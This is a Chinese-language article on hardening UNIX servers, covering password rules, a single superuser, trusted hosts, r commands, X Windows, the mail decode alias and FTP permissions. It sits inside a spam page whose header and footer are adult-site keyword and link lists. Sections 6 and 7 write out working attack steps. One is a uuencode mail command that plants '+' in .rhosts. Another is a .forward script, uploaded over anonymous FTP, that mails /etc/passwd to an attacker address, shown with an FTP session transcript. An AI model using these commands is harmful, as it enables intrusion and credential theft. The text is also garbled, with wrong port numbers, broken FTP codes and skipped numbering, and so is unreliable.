六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

投磚引玉話主機安全,打造安全主機

[摘要]隨著計算機在各行各業應用的深入和普及, 各類社會、經濟、政治、國防等重要信息大量的在計算機中存儲和網絡中傳輸。 計算機信息系統已經逐步成為整個國家政府機構運轉的命脈。 社會的計算機化產生了一種新...

隨著計算機在各行各業應用的深入和普及, 各類社會、經濟、政治、國防等重要信息大量的在計算機中存儲和網絡中傳輸。 計算機信息系統已經逐步成為整個國家政府機構運轉的命脈。 社會的計算機化產生了一種新的社會資產, 而這個信息資產由兩部分組成一部分是計算機信息系統資源-各種硬件、軟件、固件以及相關文檔資料、配套設備、設施、系統服務等;另一種則是系統生產和擁有的、存儲的電子信息資源, 可能包括統計報表、科技資料、設計圖紙、實驗數據、各類計劃、決策等。

  信息安全按其載體類型, 主要分為網絡安全和主機安全。 網絡安全控制上網擁護能安全可靠地到達網絡什么地方以及如何傳輸, 訪問哪些數據以某種方式等等。 而主機安全則控制系統用戶能否進入系統以及進入后能訪問哪些資源。 這其中包括操作系統安全、應用程序安全、數據安全、用戶安全等。

  目前國內外主流的服務器如IBM RS6000/HP N4000等均采用UNIX系統來做為其應用的平臺, 如ANSOFT/Mentor/UG等大型工程用軟件也都采用其做為其主要開發平臺。 本人在和政府、軍工等客戶長期的溝通過程中發現, 此類服務器通常處于一個非常重要的位置, 卻在安全性上很容易被忽視。 于是如何解決此類UNIX主機的安全問題, 盡量的降低安全風險就成為了一個不可不說的話題。

  1 口令安全性規則

  通過口令進行身份認證是目前實現計算機安全的主要手段之一, 一個用戶的口令被非法用戶獲悉, 則該非法用戶即獲得了該用戶的全部權限, 這樣, 尤其是高權限用戶的口令泄露以后, 主機和網絡也就隨即失去了安全性。 系統管理員以及其它所有用戶對口令選取應采取負責的態度, 消除僥幸和偷懶思想。 具體來說應遵循以下一些規則:

  口令長度不要小于6位, 并應同時包含字母和數字, 以及標點符號和控制字符。

  口令中不要使用常用單詞(避免字典攻擊)、英文簡稱、個人信息(如生日、名字、反向拼寫的登錄名、房間中可見的東西)、年份以及機器中的命令等, 不要在不同系統上, 特別是不同級別的用戶上使用同一口令。

  定期改變口令。

  系統安裝對口令文件進行隱藏的程序或設置(例如Shadow Suite for linux)。

  系統配置對用戶口令設置情況進行檢測的程序, 并強制用戶定期改變口令, 任何一個用戶口令的脆弱, 都會影響整個系統的安全性。

  2 超級用戶唯一性規則

  超級用戶對于系統的一切文件都有進行所有操作的權利。 但是最大的自由相應地也需要承擔最大的風險, 如果超級用戶權限被黑客得到, 將對整個系統帶來毀滅性的打擊。 為了減少超級用戶被破譯的可能性, 必須將系統中多余的超級用戶刪除, 在一個系統中只存在一個超級用戶是每個系統管理員必須遵守的原則。

  超級用戶可以從/etc/passwd文件中查出, 超級用戶的user ID為0, 但是group ID稍有不同, 在不同的系統版本里分別有兩種形式:0或1。 當/etc/passwd文件中有多于兩個用戶項為:用戶名:x:0:0或用戶名:x:0:1時, 就必須遵照唯一性規則進行改正。

  3 禁用Trusted主機(被信任主機)規則

  在實際工作中, 系統管理員為方便與其他主機進行數據傳輸、軟硬件資源共享和r服務(如rlogin、rsh等遠程系統調用命令), 往往在/etc/hosts.equiv文件中設置遠程主機名, 以此確認該主機為Truseted主機。 這樣, 一個被信任主機可以不需口令地訪問系統及調用r服務。 更有甚者, 某些系統管理員在/etc/hosts.equiv文件內設置"+"符號, 雖然這個參數可以方便所有遠程訪問, 但同樣方便了黑客。 因為這會使任何一臺主機上的任何用戶都可以不需口令地訪問系統, 對系統安全造成很大的損害。

  同樣, .rhosts文件也提供了Trusted主機和r命令訪問功能。 但它比/etc/hosts.equiv文件可能會導致更大的安全漏洞。 因為系統內的任何用戶都可能在各自的$HOME目錄下創建該文件。 那么.rhosts文件中指定的遠程主機上的用戶在以該用戶名登錄本地主機系統時, 不需口令認證。 特別是在.rhosts 文件內設置"+"符號的情形, 更會使任何一臺主機上的任何用戶都可以不需口令地訪問本系統的這個用戶, 從而導致安全漏洞的出現。

  為安全計, 如果無特殊需要, 應該清除一切Trusted主機相關配置。

  4 禁用r命令規則

  r命令是由Berkley開發的一系列命令軟件, 由于這些命令如rlogin、rsh、rcp、rdist等均以"r"開頭, 因此統稱為r命令。

  r命令固有的弱點包括:任何口令都是未經加密的, 如果有人對網絡進行竊聽, 很容易發現口令;整個r命令對話都是未經加密的, 對話中的每一個字符(包括口令)很容易被記錄下來;系統管理員為管理方便, 經常使用rlogin等命令從遠程登錄來調試Web服務器的設置, 形成潛在的安全漏洞。

  為安全計, 如果無特殊需要, 應該在路由器上或主機/etc/inetd.conf文件內過濾掉5110、513和514(TCP)端口, 這樣可阻止主機外部用戶使用r命令。

  5 禁用X Windows 規則

  X Windows系統是一種客戶機/服務器結構的窗口系統, 每個擁有顯示設備的主機系統都可以作為服務器, 并可接受另一個主機系統作為其客戶。 它的運行模式是:程序在客戶機系統上運行, 而用戶界面卻顯示在服務器的顯示設備上, 客戶機通過網絡把應該顯示出來的內容傳送給服務器, 服務器則把用戶的輸入通過網絡傳送給客戶機。

  和r命令一樣, 所有的X Windows 傳輸內容都是不加密的, 并且它的身份驗證功能也不夠強大, 容易喪失作用(如"xhost +"命令)。

  為安全計, 如果無特殊需要, X Windows設置可以認為是不必要的。

  6 禁用/etc/aliases中的"decode"別名規則

  如果系統管理員沒有將/etc/aliases文件內以decode別名起始的一行注釋掉, 那么該主機允許decode別名。 若用戶zy主目錄(如/export/home/zy)下的 .rhosts文件對daemon(smtp服務器通常以daemon用戶身份運行)可寫, 即有:

  sun%echo "+" uuencode /export/home/zy/.rhosts mail [email protected]

  在該例中, 本地的uuencode程序生成一個編碼流, 文件名為"/export/home/zy/.rhosts ", 內容為一個"+", 并作為電子郵件發給ngcc.com上的decode別名。 ngcc.com收到該郵件后, 把這個編碼流重定向到解碼程序uudecode, uudecode則恢復文件內容, 并試圖把它存為/export/home/zy/.rhosts。 如果daemon對/export/home/zy/目錄有寫權限, 則上述命令執行成功。 于是/export/home/zy/.rhosts中就出現一個"+", 這正是攻擊者需要的。

  為安全計, 應該禁用/etc/aliases中的"decode"別名。

  7 審核文件和目錄權限規則

  (1)FTP的根目錄

  FTP的根目錄不同于主機系統的根目錄, 所以FTP下看到的/etc/passwd和系統的/etc/passwd不是一個文件, 但有些不稱職的系統管理員在創建FTP目錄結構時會把系統的/etc/passwd文件直接拷貝過來, 這就會給黑客以可乘之機。

  FTP的根目錄是在系統的/etc/passwd文件中指定的, 也就是用匿名FTP登錄到主機后的起始目錄。

  例如:事先編寫forward_sucker_file shell腳本, 內容為:

  sun% cat forward_sucker_file

  " /bin/cat /etc/passwd sed 's/^/ /' /bin/mail [email protected]"

  通過FTP將forward_sucker_file腳本傳送到目標主機(如ngcc.com)

  sun% ftp ngcc.com

  Connected to ngcc.com

  10100 victim FTP server ready.

  Name (ngcc.com:zy): ftp

  331 Guest login ok, send ident as password.

  Password: [輸入電子郵件地址]

  1030 Guest login ok, access restrictions apply.

  ftp> put forward_sucker_file .forward

  43 bytes sent in 0.0015 seconds (108 Kbytes/s)

  ftp> quit

  將passwd文件內容發送到黑客郵件地址:

  sun% echo test mail [email protected]

  如果匿名FTP主目錄可寫, 可以在其下投放一個".forward"文件;文件內容是一行用雙引號引起來的Shell命令;".forward"文件是用于郵件轉發的:如果某一用戶(此處為ftp)的主目錄下有這個文件, 那么當該用戶收到郵件時, 就要視".forward"的內容進行轉發。 如果".forward"的內容為一些電子郵件地址, 該郵件就被轉發到這些地址;而如果為一行用雙引號引起來的Shell命令, 則該郵件的內容被重定向到此命令。 此處, 命令為:" /bin/cat /etc/passwd sed 's/^/ /' /bin/mail [email protected]", 實際上對重定向過來的作為輸入的郵件內容沒有做任何處理, 而是把/etc/passwd(為了防止被安全機制過濾, 先在每一行行首增加一個空格)發到了攻擊者的電子郵件地址([email protected])。 因此, 在投放了這樣一個".forward"文件后, 再隨便發一封電子郵件給victim.com上的FTP用戶, 通過"轉發"功能, ngcc.com上的/etc/passwd文件就寄到攻擊者的電子郵件地址上。

  (10)其他文件和目錄

  確保沒有其他文件和目錄被FTP用戶或所在的組擁有所有權(ownered by ftp account and ftp group);否則, 黑客可能借助特洛伊木馬程序對合法文件進行替代, 構成漏洞隱患。

  除了~/ftp/incoming目錄外, 匿名(anonymous)FTP 用戶在其他目錄下不能創建任何文件和子目錄。

  文件和目錄權限修改要慎重:對于系統或CERT組織推薦的有關特定文件的讀寫權限, 如/var/adm/utmpx和/var/adm/wtmpx文件權限應該為644, 不要輕易修改。 一般情況下, 擁有對任何文件和目錄具有寫權限的用戶只能是超級用戶, 進一步說, 如果一個文件或目錄可寫, 則可寫者只能為超級用戶


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 欧美综合区 | 午夜精品久久久久久中宇 | 天天色综合1 | 日韩第一页在线 | 天天看有黄有色大片 | 日本视频网站在线观看 | 日日干天天爽 | 亚洲综合区 | 欧美在线看片 | 午夜视频日本 | 欧美午夜色视频国产精品 | 青草久| 欧美一区二区三区久久综 | 涩涩屋导航 | 婷婷丁香四月 | 亚洲图片欧美 | 欧美一级在线免费观看 | 日韩免费高清一级毛片在线 | 酥酥影院一级毛片在线看 | 亚洲成综合人影院在院播放 | 日本一区二区高清免费不卡 | 欧美专区在线观看 | 欧美亚洲第一页 | 日韩精品在线观看视频 | 青草久草 | 性爽视频 | 日本精品视频在线 | 欧美亚洲国产精品 | 日韩久久影院 | 依人在线观看 | 亚洲美女视频一区 | 午夜性爽快免费视频播放 | 日本一本二本免费播放视频 | 天天干天天插天天 | 亚洲 国产精品 日韩 | 伊人久久中文字幕久久cm | 亚洲一级大黄大色毛片 | 伊人222成人综合网 伊人.com | 欧洲激情视频 | 亚洲成在人天堂在线 | 午夜影院免费体验 |